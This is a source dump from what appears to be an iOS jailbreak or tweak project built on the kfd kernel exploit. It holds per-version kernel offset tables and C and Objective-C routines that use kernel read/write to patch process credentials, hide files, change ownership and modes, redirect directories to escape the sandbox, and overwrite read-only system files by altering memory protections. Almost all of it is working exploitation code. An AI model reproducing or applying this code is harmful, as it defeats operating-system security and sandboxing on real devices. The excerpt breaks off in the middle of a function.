//https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/vnode_internal.h#L158 off_vnode_v_ncchildren_tqh_first = 0x30; off_vnode_v_iocount = 0x64; off_vnode_v_usecount = 0x60; off_vnode_v_flag = 0x54; off_vnode_v_name = 0xb8; off_vnode_v_mount = 0xD8; off_vnode_v_data = 0xe0; off_vnode_v_kusecount = 0x5c; off_vnode_v_references = 0x5b; off_vnode_v_parent = 0xc0; off_vnode_v_label = 0xe8; off_vnode_v_cred = 0x98; off_vnode_v_writecount = 0xb0; off_vnode_v_type = 0x70; //https://github.com/apple-oss-distributions/xnu/blob/main/bsd/sys/mount_internal.h#L108 off_mount_mnt_data = 0x11F; off_mount_mnt_fsowner = 0x9c0; off_mount_mnt_fsgroup = 0x9c4; off_mount_mnt_devvp = 0x980; off_mount_mnt_flag = 0x70; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/miscfs/specfs/specdev.h#L77 off_specinfo_si_flags = 0x10; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/namei.h#L243 off_namecache_nc_vp = 0x48; off_namecache_nc_child_tqe_prev = 0x10; } else if (SYSTEM_VERSION_EQUAL_TO(@"16.7.2")||SYSTEM_VERSION_EQUAL_TO(@"16.7.1")||SYSTEM_VERSION_EQUAL_TO(@"16.7")||SYSTEM_VERSION_EQUAL_TO(@"16.6.1")||SYSTEM_VERSION_EQUAL_TO(@"16.6")||SYSTEM_VERSION_EQUAL_TO(@"16.4")||SYSTEM_VERSION_EQUAL_TO(@"16.4.1")||SYSTEM_VERSION_EQUAL_TO(@"16.5") || SYSTEM_VERSION_EQUAL_TO(@"16.5.1")) { NSLog(@"[i] offsets selected for iOS 16.6"); //iPhone 11 Pro 16.6 offsets //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_internal.h#L273 //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/queue.h#L487 off_p_list_le_prev = 0x8; off_p_proc_ro = 0x18; off_p_ppid = 0x20; off_p_original_ppid = 0x24; off_p_pgrpid = 0x28; off_p_uid = 0x2c; off_p_gid = 0x30; off_p_ruid = 0x34; off_p_rgid = 0x38; off_p_svuid = 0x3c; off_p_svgid = 0x40; off_p_sessionid = 0x44; off_p_puniqueid = 0x48; off_p_pid = 0x60; off_p_pfd = 0xf8; off_p_textvp = 0x548; off_p_name = 0x381; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_ro.h#L59 off_p_ro_p_csflags = 0x1c; off_p_ro_p_ucred = 0x20; off_p_ro_pr_proc = 0; off_p_ro_pr_task = 0x8; off_p_ro_t_flags_ro = 0x78; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/ucred.h#L91 off_u_cr_label = 0x78; off_u_cr_posix = 0x18; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/ucred.h#L100 off_cr_uid = 0; off_cr_ruid = 0x4; off_cr_svuid = 0x8; off_cr_ngroups = 0xc; off_cr_groups = 0x10; off_cr_rgid = 0x50; off_cr_svgid = 0x54; off_cr_gmuid = 0x58; off_cr_flags = 0x5c; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/kern/task.h#L280 off_task_t_flags = 0x3D0; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/filedesc.h#L138 off_fd_ofiles = 0; off_fd_cdir = 0x20; // new one! https://github.com/Baw-Appie/KernBypass/blob/69e5ae6baf04d0978358feee57eca8b8bc1382ed/kernel.h#L390 try these //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/file_internal.h#L125 off_fp_glob = 0x10; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/file_internal.h#L179 off_fg_data = 0x38; off_fg_flag = 0x10; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/vnode_internal.h#L158 off_vnode_v_ncchildren_tqh_first = 0x30; off_vnode_v_iocount = 0x64; off_vnode_v_usecount = 0x60; off_vnode_v_flag = 0x54; off_vnode_v_name = 0xb8; off_vnode_v_mount = 0xd8; off_vnode_v_data = 0xe0; off_vnode_v_kusecount = 0x5c; off_vnode_v_references = 0x5b; off_vnode_v_parent = 0xc0; off_vnode_v_label = 0xe8; off_vnode_v_cred = 0x98; off_vnode_v_writecount = 0xb0; off_vnode_v_type = 0x70; //https://github.com/apple-oss-distributions/xnu/blob/main/bsd/sys/mount_internal.h#L108 off_mount_mnt_data = 0x11F; off_mount_mnt_fsowner = 0x9c0; off_mount_mnt_fsgroup = 0x9c4; off_mount_mnt_devvp = 0x980; off_mount_mnt_flag = 0x70; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/miscfs/specfs/specdev.h#L77 off_specinfo_si_flags = 0x10; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/namei.h#L243 off_namecache_nc_vp = 0x48; off_namecache_nc_child_tqe_prev = 0x0; }else { NSLog(@"[-] No matching offsets."); exit(EXIT_FAILURE); } } ================================================ FILE: usprebooter/fun/proc.c ================================================ // // proc.c // kfd // // Created by Seo Hyun-gyu on 2023/07/29. // #include "proc.h" #include "offsets.h" #include "krw.h" #include #include #include #include void NSLog(CFStringRef, ...); uint64_t getProc(pid_t pid) { uint64_t proc = get_kernproc(); while (true) { if(kread32(proc + off_p_pid) == pid) { return proc; } proc = kread64(proc + off_p_list_le_prev); if(!proc) { return -1; } } return 0; } uint64_t getProcByName(char* nm) { uint64_t proc = get_kernproc(); while (true) { uint64_t nameptr = proc + off_p_name; char name[32]; do_kread(nameptr, &name, 32); // NSLog(CFSTR("[i] pid: %d, process name: %s"), kread32(proc + off_p_pid), name); if(strcmp(name, nm) == 0) { return proc; } proc = kread64(proc + off_p_list_le_prev); if(!proc) { return -1; } } return 0; } int getPidByName(char* nm) { uint64_t proc = getProcByName(nm); if(proc == -1) return -1; return kread32(proc + off_p_pid); } int funProc(uint64_t proc) { int p_ppid = kread32(proc + off_p_ppid); NSLog(CFSTR("[i] self proc->p_ppid: %d\n"), p_ppid); NSLog(CFSTR("[i] Patching proc->p_ppid %d -> 1 (for testing kwrite32, getppid)"), p_ppid); kwrite32(proc + off_p_ppid, 0x1); NSLog(CFSTR("[+] Patched getppid(): %u"), getppid()); kwrite32(proc + off_p_ppid, p_ppid); NSLog(CFSTR("[+] Restored getppid(): %u"), getppid()); int p_original_ppid = kread32(proc + off_p_original_ppid); NSLog(CFSTR("[i] self proc->p_original_ppid: %d"), p_original_ppid); int p_pgrpid = kread32(proc + off_p_pgrpid); NSLog(CFSTR("[i] self proc->p_pgrpid: %d"), p_pgrpid); int p_uid = kread32(proc + off_p_uid); NSLog(CFSTR("[i] self proc->p_uid: %d"), p_uid); int p_gid = kread32(proc + off_p_gid); NSLog(CFSTR("[i] self proc->p_gid: %d"), p_gid); int p_ruid = kread32(proc + off_p_ruid); NSLog(CFSTR("[i] self proc->p_ruid: %d"), p_ruid); int p_rgid = kread32(proc + off_p_rgid); NSLog(CFSTR("[i] self proc->p_rgid: %d"), p_rgid); int p_svuid = kread32(proc + off_p_svuid); NSLog(CFSTR("[i] self proc->p_svuid: %d"), p_svuid); int p_svgid = kread32(proc + off_p_svgid); NSLog(CFSTR("[i] self proc->p_svgid: %d"), p_svgid); int p_sessionid = kread32(proc + off_p_sessionid); NSLog(CFSTR("[i] self proc->p_sessionid: %d"), p_sessionid); uint64_t p_puniqueid = kread64(proc + off_p_puniqueid); NSLog(CFSTR("[i] self proc->p_puniqueid: 0x%llx"), p_puniqueid); NSLog(CFSTR("[i] Patching proc->p_puniqueid 0x%llx -> 0x4142434445464748 (for testing kwrite64)"), p_puniqueid); kwrite64(proc + off_p_puniqueid, 0x4142434445464748); NSLog(CFSTR("[+] Patched self proc->p_puniqueid: 0x%llx"), kread64(proc + off_p_puniqueid)); kwrite64(proc + off_p_puniqueid, p_puniqueid); NSLog(CFSTR("[+] Restored self proc->p_puniqueid: 0x%llx"), kread64(proc + off_p_puniqueid)); return 0; } ================================================ FILE: usprebooter/fun/proc.h ================================================ // // proc.h // kfd // // Created by Seo Hyun-gyu on 2023/07/29. // #include uint64_t getProc(pid_t pid); uint64_t getProcByName(char* nm); int getPidByName(char* nm); int funProc(uint64_t proc); ================================================ FILE: usprebooter/fun/thanks_opa334dev_htrowii.h ================================================ // // thanks_opa334dev_htrowii.h // kfd // // Created by Seo Hyun-gyu on 2023/07/30. // #import uint64_t funVnodeOverwrite2(char* tofile, char* fromfile); void kreadbuf(uint64_t kaddr, void* output, size_t size); uint64_t getTask(void); ================================================ FILE: usprebooter/fun/thanks_opa334dev_htrowii.m ================================================ // // thanks_opa334dev_htrowii.m // kfd // // Created by Seo Hyun-gyu on 2023/07/30. // #import #import #import #import "krw.h" #import "proc.h" #import "common.h" #define FLAGS_PROT_SHIFT 7 #define FLAGS_MAXPROT_SHIFT 11 //#define FLAGS_PROT_MASK 0xF << FLAGS_PROT_SHIFT //#define FLAGS_MAXPROT_MASK 0xF << FLAGS_MAXPROT_SHIFT #define FLAGS_PROT_MASK 0x780 #define FLAGS_MAXPROT_MASK 0x7800 // https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/mman.h#L143 from wh1te4ever/xsf1re #define MS_INVALIDATE 0x0002 /* [MF|SIO] invalidate all cached data https://openradar.appspot.com/FB8914231 My favorite: you can call msync(…, MS_INVALIDATE) on the mmaped region, asking xnu to throw away what it knows about the vnode. If you compile mmap_copy.cc with MMAP_COPY_MSYNC_INVALIDATE defined, it will do this. You can even use this technique to “save” a broken vnode from an entirely different process by opening the file,mmaping it, and then calling msync. */ u64 getTask(void) { u64 proc = getProc(getpid()); u64 proc_ro = kread64(proc + 0x18); u64 pr_task = kread64(proc_ro + 0x8); NSLog(@"[i] self proc->proc_ro->pr_task: 0x%llx", pr_task); return pr_task; } u64 kread_ptr(u64 kaddr) { u64 ptr = kread64(kaddr); if ((ptr >> 55) & 1) { return ptr | base_pac_mask; } return ptr; } void kreadbuf(u64 kaddr, void* output, size_t size) { u64 endAddr = kaddr + size; uint32_t outputOffset = 0; unsigned char* outputBytes = (unsigned char*)output; for(u64 curAddr = kaddr; curAddr < endAddr; curAddr += 4) { uint32_t k = kread32(curAddr); unsigned char* kb = (unsigned char*)&k; for(int i = 0; i < 4; i++) { if(outputOffset == size) break; outputBytes[outputOffset] = kb[i]; outputOffset++; } if(outputOffset == size) break; } } u64 vm_map_get_header(u64 vm_map_ptr) { return vm_map_ptr + 0x10; } u64 vm_map_header_get_first_entry(u64 vm_header_ptr) { return kread_ptr(vm_header_ptr + 0x8); } u64 vm_map_entry_get_next_entry(u64 vm_entry_ptr) { return kread_ptr(vm_entry_ptr + 0x8); } uint32_t vm_header_get_nentries(u64 vm_header_ptr) { return kread32(vm_header_ptr + 0x20); } void vm_entry_get_range(u64 vm_entry_ptr, u64 *start_address_out, u64 *end_address_out) { u64 range[2]; usleep(350); kreadbuf(vm_entry_ptr + 0x10, &range[0], sizeof(range)); if (start_address_out) *start_address_out = range[0]; if (end_address_out) *end_address_out = range[1]; } //void vm_map_iterate_entries(u64 vm_map_ptr, void (^itBlock)(u64 start, u64 end, u64 entry, BOOL *stop)) void vm_map_iterate_entries(u64 vm_map_ptr, void (^itBlock)(u64 start, u64 end, u64 entry, BOOL *stop)) { u64 header = vm_map_get_header(vm_map_ptr); u64 entry = vm_map_header_get_first_entry(header); u64 numEntries = vm_header_get_nentries(header); while (entry != 0 && numEntries > 0) { u64 start = 0, end = 0; vm_entry_get_range(entry, &start, &end); BOOL stop = NO; itBlock(start, end, entry, &stop); if (stop) break; entry = vm_map_entry_get_next_entry(entry); numEntries--; } } u64 vm_map_find_entry(u64 vm_map_ptr, u64 address) { __block u64 found_entry = 0; usleep(350); vm_map_iterate_entries(vm_map_ptr, ^(u64 start, u64 end, u64 entry, BOOL *stop) { if (address >= start && address < end) { found_entry = entry; *stop = YES; } }); return found_entry; } void vm_map_entry_set_prot(u64 entry_ptr, vm_prot_t prot, vm_prot_t max_prot) { u64 flags = kread64(entry_ptr + 0x48); u64 new_flags = flags; new_flags = (new_flags & ~FLAGS_PROT_MASK) | ((u64)prot << FLAGS_PROT_SHIFT); new_flags = (new_flags & ~FLAGS_MAXPROT_MASK) | ((u64)max_prot << FLAGS_MAXPROT_SHIFT); if (new_flags != flags) { kwrite64(entry_ptr + 0x48, new_flags); } } u64 start = 0, end = 0; u64 task_get_vm_map(u64 task_ptr) { return kread_ptr(task_ptr + 0x28); } char* funVnodeRead(char *file) { NSLog(@"attempting opa's method"); NSLog(@"reading %s", file); int file_index = open(file, O_RDONLY); if (file_index == -1) { NSLog(@"to file nonexistent"); return -1; } off_t file_size = lseek(file_index, 0, SEEK_END); NSLog(@"mmap as readonly"); char* file_data = mmap(NULL, file_size, PROT_READ, MAP_SHARED | MAP_RESILIENT_CODESIGN, file_index, 0); if (file_data == MAP_FAILED) { NSLog(@"Map failed"); close(file_index); return 0; } munmap(file_data, file_size); close(file_index); return file_data; } void funVnodeSave(char* file) { int file_index = open(file, O_RDONLY); if (file_index == -1) { NSLog(@"to file nonexistent"); return; } off_t file_size = lseek(file_index, 0, SEEK_END); NSLog(@"mmap as readonly"); char* file_data = mmap(NULL, file_size, PROT_READ, MAP_SHARED, file_index, 0); if (file_data == MAP_FAILED) { close(file_index); return; } for (int i; i<10; i++) { // msync with invalidate to NSLog(@"msyncing"); if (msync(file_data, file_size, MS_INVALIDATE) == -1) { perror("[-] Failed to msync\n"); } } } #pragma mark overwrite2 u64 funVnodeOverwrite2(char* to, char* from) { NSLog(@"writing to %s", to); int to_file_index = open(to, O_RDONLY); if (to_file_index == -1) { NSLog(@"to file nonexistent"); return -1; } off_t to_file_size = lseek(to_file_index, 0, SEEK_END); NSLog(@" from %s", from); int from_file_index = open(from, O_RDONLY); if (from_file_index == -1) { NSLog(@"from file nonexistent"); return -1; } off_t from_file_size = lseek(from_file_index, 0, SEEK_END); if(to_file_size < from_file_size) { close(from_file_index); close(to_file_index); NSLog(@"[-] File is too big to overwrite!"); return -1; } usleep(450); //mmap as read only NSLog(@"mmap as readonly\n"); char* to_file_data = mmap(NULL, to_file_size, PROT_READ, MAP_SHARED, to_file_index, 0); if (to_file_data == MAP_FAILED) { close(to_file_index); // Handle error mapping source file return 0; } // set prot to rw- NSLog(@"task_get_vm_map -> vm ptr"); u64 vm_ptr = task_get_vm_map(getTask()); u64 entry_ptr = vm_map_find_entry(vm_ptr, (u64)to_file_data); NSLog(@"set prot to rw-"); vm_map_entry_set_prot(entry_ptr, PROT_READ | PROT_WRITE, PROT_READ | PROT_WRITE); char* from_file_data = mmap(NULL, from_file_size, PROT_READ, MAP_SHARED, from_file_index, 0); if (from_file_data == MAP_FAILED) { perror("[-] Failed mmap (from_mapped)"); close(from_file_index); close(to_file_index); return -1; } NSLog(@"it is writable!"); memcpy(to_file_data, from_file_data, from_file_size); NSLog(@"[i] msync ret: %dn", msync(to_file_data, to_file_size, MS_SYNC)); // funVnodeSave(to); // Cleanup munmap(from_file_data, from_file_size); munmap(to_file_data, to_file_size); close(from_file_index); close(to_file_index); NSLog(@"done"); // Return success or error code return 0; } u64 funVnodeOverwriteWithBytes(const char* filename, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd) { NSLog(@"attempting opa's method"); int file_index = open(filename, O_RDONLY); if (file_index == -1) return -1; off_t file_size = lseek(file_index, 0, SEEK_END); if (file_size < file_offset + overwrite_length) { close(file_index); NSLog(@"[-] Offset + length is beyond the file size!"); return -1; } // mmap as read-write NSLog(@"mmap as read only"); char* file_data = mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, file_index, 0); if (file_data == MAP_FAILED) { NSLog(@"failed mmap... try again"); close(file_index); // Handle error mapping the file return -1; } NSLog(@"task_get_vm_map -> vm ptr"); u64 task_ptr = getTask(); u64 vm_ptr = task_get_vm_map(task_ptr); NSLog(@"entry_ptr"); u64 entry_ptr = vm_map_find_entry(vm_ptr, (u64)file_data); NSLog(@"set prot to rw-"); vm_map_entry_set_prot(entry_ptr, PROT_READ | PROT_WRITE, PROT_READ | PROT_WRITE); NSLog(@"Writing data at offset %lld", file_offset); memcpy(file_data + file_offset, overwrite_data, overwrite_length); // if (unmapAtEnd) { munmap(file_data, file_size); close(file_index); // } return 1; } void overwriteWithFileImpl(NSURL *replacementURL, const char *pathToTargetFile) { NSString *tempURLString = [replacementURL absoluteString]; const char *cTempURL = [tempURLString UTF8String]; const char *shortenedURL = cTempURL + 7; // Make sure that cTempURL is null-terminated // Print the shortenedURL to verify if it's correct NSLog(@"Shortened URL: %s", shortenedURL); funVnodeOverwrite2(pathToTargetFile, shortenedURL); } void TempOverwriteFile(int type) { if (type == 0) { funVnodeOverwrite2("/System/Library/PrivateFrameworks/SpringBoardHome.framework/folderDark.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); funVnodeOverwrite2("/System/Library/PrivateFrameworks/SpringBoardHome.framework/folderLight.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); } else if (type == 1) { funVnodeOverwrite2("/System/Library/PrivateFrameworks/SpringBoardHome.framework/podBackgroundViewDark.visualstyleset", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); funVnodeOverwrite2("/System/Library/PrivateFrameworks/SpringBoardHome.framework/podBackgroundViewLight.visualstyleset", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); } else if (type == 2) { funVnodeOverwrite2("/System/Library/PrivateFrameworks/CoreMaterial.framework/dockDark.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); funVnodeOverwrite2("/System/Library/PrivateFrameworks/CoreMaterial.framework/dockLight.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); } else if (type == 3) { funVnodeOverwrite2("/System/Library/PrivateFrameworks/SpringBoardHome.framework/folderExpandedBackgroundHome.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); funVnodeOverwrite2("/System/Library/PrivateFrameworks/SpringBoardHome.framework/homeScreenOverlay.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); funVnodeOverwrite2("/System/Library/PrivateFrameworks/SpringBoardHome.framework/homeScreenOverlay-iPad.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); } else if (type == 4) { funVnodeOverwrite2("/System/Library/PrivateFrameworks/SpringBoard.framework/homeScreenBackdrop-application.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); } else if (type == 5) { funVnodeOverwrite2("/System/Library/PrivateFrameworks/CoreMaterial.framework/plattersDark.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); funVnodeOverwrite2("/System/Library/PrivateFrameworks/CoreMaterial.framework/platters.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); } else if (type == 6) { funVnodeOverwrite2("/System/Library/PrivateFrameworks/PlatterKit.framework/platterVibrantShadowDark.visualstyleset", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); funVnodeOverwrite2("/System/Library/PrivateFrameworks/PlatterKit.framework/platterVibrantShadowLight.visualstyleset", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); } else if (type == 7) { funVnodeOverwrite2("/System/Library/PrivateFrameworks/CoreMaterial.framework/modules.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); } else if (type == 8) { funVnodeOverwrite2("/System/Library/PrivateFrameworks/CoreMaterial.framework/modulesBackground.materialrecipe", [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/TempOverwriteFile"].UTF8String); } } ================================================ FILE: usprebooter/fun/utils.h ================================================ // // utils.h // kfd // // Created by Seo Hyun-gyu on 2023/07/30. // #include #include #include void HexDump(uint64_t addr, size_t size); ================================================ FILE: usprebooter/fun/utils.m ================================================ // // utils.m // kfd // // Created by Seo Hyun-gyu on 2023/07/30. // #import #import #import #import #import #import "proc.h" #import "vnode.h" #import "krw.h" #import "offsets.h" #import "thanks_opa334dev_htrowii.h" #import "utils.h" uint64_t createFolderAndRedirect(uint64_t vnode, NSString *mntPath) { [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil]; uint64_t orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); return orig_to_v_data; } uint64_t UnRedirectAndRemoveFolder(uint64_t orig_to_v_data, NSString *mntPath) { funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; return 0; } void HexDump(uint64_t addr, size_t size) { void *data = malloc(size); kreadbuf(addr, data, size); char ascii[17]; size_t i, j; ascii[16] = '\0'; for (i = 0; i < size; ++i) { if ((i % 16) == 0) { NSLog(@"[0x%016llx+0x%03zx] ", addr, i); // NSLog(@"[0x%016llx] ", i + addr); } NSLog(@"%02X ", ((unsigned char*)data)[i]); if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { ascii[i % 16] = ((unsigned char*)data)[i]; } else { ascii[i % 16] = '.'; } if ((i+1) % 8 == 0 || i+1 == size) { NSLog(@" "); if ((i+1) % 16 == 0) { NSLog(@"| %s \n", ascii); } else if (i+1 == size) { ascii[(i+1) % 16] = '\0'; if ((i+1) % 16 <= 8) { NSLog(@" "); } for (j = (i+1) % 16; j < 16; ++j) { NSLog(@" "); } NSLog(@"| %s \n", ascii); } } } free(data); } ================================================ FILE: usprebooter/fun/vnode.h ================================================ // // vnode.h // kfd // // Created by Seo Hyun-gyu on 2023/07/29. // #include //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/mount.h#L293 #define MNT_RDONLY 0x00000001 /* read only filesystem */ #define MNT_NOSUID 0x00000008 /* don't honor setuid bits on fs */ #define MNT_ROOTFS 0x00004000 /* identifies the root filesystem */ #define MNT_UPDATE 0x00010000 /* not a real mount, just an update */ //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/vnode_internal.h#L297 #define VISSHADOW 0x008000 /* vnode is a shadow file */ //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/fcntl.h#L112 //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/fcntl.h#L231 #define FREAD 0x00000001 #define FWRITE 0x00000002 uint64_t getVnodeAtPath(char* filename); /* return vnode of path, if open(filename, RD_ONLY) returned -1, it fails */ uint64_t getVnodeAtPathByChdir(char *path); /* return vnode of path, but only directories work. NOT files. */ uint64_t findRootVnode(void); /* return root vnode as is */ /* Description: Hide file or directory. Return vnode value for restore. */ uint64_t funVnodeHide(char* filename); /* Description: Reveal file or directory. Required vnode value to restore. */ uint64_t funVnodeReveal(uint64_t vnode); /* Description: Perform chown to file or directory. */ uint64_t funVnodeChown(char* filename, uid_t uid, gid_t gid); /* Description: Perform chmod to file or directory. */ uint64_t funVnodeChmod(char* filename, mode_t mode); /* Description: Redirect directory to another directory. Only work when mount points of directories are same. Can be escaped out of sandbox. If succeeds, return value to_vnode->v_data (for unredirect) */ uint64_t funVnodeRedirectFolder(char* to, char* from); /* Description: Perform overwrite file data to file. Only work when file size is 'lower or same' than original file size. Overwriting executable file also works, but executing will not work anymore. just freeze or crash. */ uint64_t funVnodeOverwriteFile(char* to, char* from); /* Description: Iterating sub directory or file at dirname. */ uint64_t funVnodeIterateByPath(char* dirname); /* Description: Iterating sub directory or file at vnode. */ uint64_t funVnodeIterateByVnode(uint64_t vnode); /* Description: Redirect directory to another directory using vnode. Only work when mount points of directories are same. Can be escaped out of sandbox. If succeeds, return value to_vnode->v_data (for unredirect) */ uint64_t funVnodeRedirectFolderFromVnode(char* to, uint64_t from_vnode); /* Description: UnRedirect directory to another directory. It needs orig_to_v_data, ususally you can get return value of funVnodeRedirectFolder / funVnodeRedirectFolderByVnode */ uint64_t funVnodeUnRedirectFolder(char* to, uint64_t orig_to_v_data); /* Description: Return vnode of subdirectory or sub file in vnode. childname can be what you want to find subdirectory or file name. vnode should be vnode of root directory. */ uint64_t findChildVnodeByVnode(uint64_t vnode, char* childname); /* Description: Perform overwrite file data to file. You can overwrite file data without file size limit! but only works on /var files. Overwriting executable file also works, but executing will also work since using write() instead of mmap(). https://openradar.appspot.com/FB8914231 */ uint64_t funVnodeOverwriteFileUnlimitSize(char* to, char* from); ///var/containers/Bundle/Application/88F96BC5-912F-4924-A4BC-4A03324BE549/usprebooter.app/shim void ChangeDirFor(int pid, const char *where); // change directory for something with chroot int SwitchSysBin(uint64_t vnode, char* what, char* with); // overwrite v_name to swap files ================================================ FILE: usprebooter/fun/vnode.m ================================================ // // vnode.c // kfd // // Created by Seo Hyun-gyu on 2023/07/29. // #include "vnode.h" #include "krw.h" #include "proc.h" #include "offsets.h" #include "common.h" #include #include #include #include #include #include #include "thanks_opa334dev_htrowii.h" #include "utils.h" uint64_t getVnodeAtPath(char* filename) { int file_index = open(filename, O_RDONLY); if (file_index == -1) return -1; uint64_t proc = getProc(getpid()); uint64_t filedesc_pac = kread64(proc + off_p_pfd); uint64_t filedesc = filedesc_pac | base_pac_mask; uint64_t openedfile = kread64(filedesc + (8 * file_index)); uint64_t fileglob_pac = kread64(openedfile + off_fp_glob); uint64_t fileglob = fileglob_pac | base_pac_mask; uint64_t vnode_pac = kread64(fileglob + off_fg_data); uint64_t vnode = vnode_pac | base_pac_mask; close(file_index); return vnode; } uint64_t funVnodeHide(char* filename) { uint64_t vnode = getVnodeAtPath(filename); if(vnode == -1) { NSLog(@"[-] Unable to get vnode, path: %s", filename); return -1; } //vnode_ref, vnode_get uint32_t usecount = kread32(vnode + off_vnode_v_usecount); uint32_t iocount = kread32(vnode + off_vnode_v_iocount); NSLog(@"[i] vnode->usecount: %d, vnode->iocount: %d", usecount, iocount); kwrite32(vnode + off_vnode_v_usecount, usecount + 1); kwrite32(vnode + off_vnode_v_iocount, iocount + 1); //hide file uint32_t v_flags = kread32(vnode + off_vnode_v_flag); NSLog(@"[i] vnode->v_flags: 0x%x", v_flags); kwrite32(vnode + off_vnode_v_flag, (v_flags | VISSHADOW)); //exist test (should not be exist NSLog(@"[i] %s access ret: %d", filename, access(filename, F_OK)); //restore vnode iocount, usecount usecount = kread32(vnode + off_vnode_v_usecount); iocount = kread32(vnode + off_vnode_v_iocount); if(usecount > 0) kwrite32(vnode + off_vnode_v_usecount, usecount - 1); if(iocount > 0) kwrite32(vnode + off_vnode_v_iocount, iocount - 1); return vnode; } uint64_t funVnodeReveal(uint64_t vnode) { //vnode_ref, vnode_get uint32_t usecount = kread32(vnode + off_vnode_v_usecount); uint32_t iocount = kread32(vnode + off_vnode_v_iocount); NSLog(@"[i] vnode->usecount: %d, vnode->iocount: %d", usecount, iocount); kwrite32(vnode + off_vnode_v_usecount, usecount + 1); kwrite32(vnode + off_vnode_v_iocount, iocount + 1); //show file uint32_t v_flags = kread32(vnode + off_vnode_v_flag); kwrite32(vnode + off_vnode_v_flag, (v_flags &= ~VISSHADOW)); //restore vnode iocount, usecount usecount = kread32(vnode + off_vnode_v_usecount); iocount = kread32(vnode + off_vnode_v_iocount); if(usecount > 0) kwrite32(vnode + off_vnode_v_usecount, usecount - 1); if(iocount > 0) kwrite32(vnode + off_vnode_v_iocount, iocount - 1); return 0; } uint64_t funVnodeChown(char* filename, uid_t uid, gid_t gid) { uint64_t vnode = getVnodeAtPath(filename); if(vnode == -1) { NSLog(@"[-] Unable to get vnode, path: %s", filename); return -1; } uint64_t v_data = kread64(vnode + off_vnode_v_data); uint32_t v_uid = kread32(v_data + 0x80); uint32_t v_gid = kread32(v_data + 0x84); //vnode->v_data->uid NSLog(@"[i] Patching %s vnode->v_uid %d -> %d", filename, v_uid, uid); kwrite32(v_data+0x80, uid); //vnode->v_data->gid NSLog(@"[i] Patching %s vnode->v_gid %d -> %d", filename, v_gid, gid); kwrite32(v_data+0x84, gid); struct stat file_stat; if(stat(filename, &file_stat) == 0) { NSLog(@"[+] %s UID: %d", filename, file_stat.st_uid); NSLog(@"[+] %s GID: %d", filename, file_stat.st_gid); } return 0; } uint64_t funVnodeChmod(char* filename, mode_t mode) { uint64_t vnode = getVnodeAtPath(filename); if(vnode == -1) { NSLog(@"[-] Unable to get vnode, path: %s", filename); return -1; } uint64_t v_data = kread64(vnode + off_vnode_v_data); uint32_t v_mode = kread32(v_data + 0x88); NSLog(@"[i] Patching %s vnode->v_mode %o -> %o", filename, v_mode, mode); kwrite32(v_data+0x88, mode); struct stat file_stat; if(stat(filename, &file_stat) == 0) { NSLog(@"[+] %s mode: %o", filename, file_stat.st_mode); } return 0; } uint64_t findRootVnode(void) { uint64_t launchd_proc = getProc(1); 